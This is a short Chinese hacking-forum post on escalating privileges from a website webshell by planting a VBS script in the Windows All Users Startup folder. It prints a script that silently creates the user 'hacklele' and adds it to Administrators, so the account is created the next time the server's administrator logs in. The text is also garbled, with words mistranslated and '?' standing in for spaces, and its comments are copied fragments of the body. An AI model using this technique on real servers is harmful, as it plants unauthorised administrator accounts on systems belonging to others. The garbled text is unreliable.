把webshell写到启动中
我们在取得个网站的webshell的时候如果想进一步的获得网站的网络服务器管理权限.
我们可以查看现在网络服务器上系统盘的可读可写文件目录
也许网络服务器上的?C:\Documents?little?Settings\All?Users\「开始」莱单\程序\起动???‘文件目录存在可读可写文件目录
那么我们就可以实行发送一个vbs或者bat的脚本制作进行提权。
这里我也具体来讲解下用vbs脚本制作进行提权,来加上用户。
1.我们先写一个vbs的加上用户登陆密码的脚本制作?脚本制作编码如下?大家可自主改动用户登陆密码。
get?wshshell=createobject?("wscript.shell")
a=wshshell.run?("cmd.exe?/c?net?user?hacklele?hacklele??/Add",0)
b=wshshell.run?("cmd.exe?/c?net?localgroup?Administrators?hacklele?/Add",0)
改动帐号密码后随后拷贝以上编码?随后储存为.vbs的文件?文件夹名称随意。
2.储存之后未来vbs脚本制作上传入?C:\Documents?little?Settings\All?Users\「开始」莱单\程序\起动
随后我们就提权结束,等目标网络服务器再度登陆的时候即可自动加上帐号密码。
Ps:?对于有细心的朋友可以通过,这种方法来进行提权试着。?当然我们的目标是让管理人员登陆网络服务器。?至于如何做大家自主发挥。
相关文章
- 4条评论
- 断渊安娴2022-05-30 21:24:57
- 我们在取得个网站的webshell的时候如果想进一步的获得网站的网络服务器管理权限. 我们可以查看现在网络服务器上系统盘的可读可写文件目录 也许网络服务器上的?C:\Docu
- 慵吋情授2022-05-30 22:00:51
- \Documents?little?Settings\All?Users\「开始」莱单\程序\起动 随后我们就提权结束,等目标网络服务器再度登陆的时候即可自动加上帐号密码。 Ps:?对于有细心的朋友可以通过,这种方法来进行提权试着。?当然我们的目标是让管理人员登陆网络服
- 忿咬未几2022-05-30 23:40:05
- Add",0) b=wshshell.run?("cmd.exe?/c?net?localgroup?Administrators?hacklele?/Add",0) 改动帐号密码后随后拷贝以上编码?随后储存为.vbs的文件
- 双笙七禾2022-05-30 17:55:35
- 作进行提权。 这里我也具体来讲解下用vbs脚本制作进行提权,来加上用户。 1.我们先写一个vbs的加上用户登陆密码的脚本制作?脚本制作编码如下?大家可自主改动用户登陆密码。